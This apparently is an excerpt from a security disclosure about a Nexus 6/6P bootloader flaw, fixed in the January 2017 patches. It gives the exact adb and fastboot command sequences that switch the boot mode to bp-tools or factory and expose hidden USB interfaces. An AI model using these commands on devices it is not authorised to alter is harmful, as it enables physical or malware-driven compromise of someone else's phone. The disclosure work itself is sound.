Nexus 6P
Nexus 6
Nexus 6 before the January 2017 security patches
Nexus 6P before the January 2017 security patches
The adversary can change the androidboot.mode kernel command line argument which eventually causes Android to enable hidden USB interfaces with extra functionality.
It turns out that under the Nexus 6P/6 device’s fastboot UI (which an unauthenticated physical attacker can boot into), two proprietary
menu items exist. These menu items instruct, even on a locked bootloader, to change the androidboot.mode argument to either bp-tools or hw/mot-factory. An attacker with ADB access, such as PC malware or a malicious charger connected to an ADB-enabled device, can also change the
bootmode permanently, by issuing the following commands:
adb reboot bootloader
fastboot oem config bootmode bp-tools (N6)
fastboot oem bp-tools-on (N6, option 2)
fastboot oem enable-bp-tools (N6P)
fastboot reboot
Similarly, in order to boot with hw/mot-factory, the attacker can issue:
adb reboot bootloader
fastboot oem config bootmode factory (N6)
fastboot oem enable-hw-factory (N6P)
fastboot reboot